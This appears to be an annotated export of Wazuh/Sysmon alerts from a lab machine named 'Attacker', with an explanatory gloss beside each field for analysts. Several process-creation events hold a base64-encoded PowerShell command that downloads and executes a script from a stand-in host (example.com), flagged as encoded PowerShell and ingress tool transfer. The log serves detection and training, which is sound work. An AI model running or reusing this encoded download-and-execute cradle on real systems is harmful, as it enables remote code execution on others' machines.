data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 112 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534428.2068054 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:25.7046533Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285960 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:25.693
ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00}
ProcessId: 4932
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z2gh0htk.wyn.ps1
CreationUtcTime: 2025-04-24 22:40:25.693
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:25.693 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd8-680a-d10b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2gh0htk.wyn.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:25.693 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 109 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534430.2070819 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:28.0845268Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285983 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:26.887
ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00}
ProcessId: 11028
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00}
ParentProcessId: 4932
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:26.887 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdda-680a-d30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 113 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534430.2078886 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:28.7262487Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285988 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:28.699
ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00}
ProcessId: 11028
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1
CreationUtcTime: 2025-04-24 22:40:28.699
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:28.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdda-680a-d30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:28.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 110 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534433.2081655 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:31.1947018Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286008 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:29.920
ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00}
ProcessId: 16696
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00}
ParentProcessId: 11028
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:29.920 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bddd-680a-d50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 114 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534433.2089726 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:31.3710438Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286009 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:31.361
ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00}
ProcessId: 16696
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4ssfrd1y.lll.ps1
CreationUtcTime: 2025-04-24 22:40:31.361
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
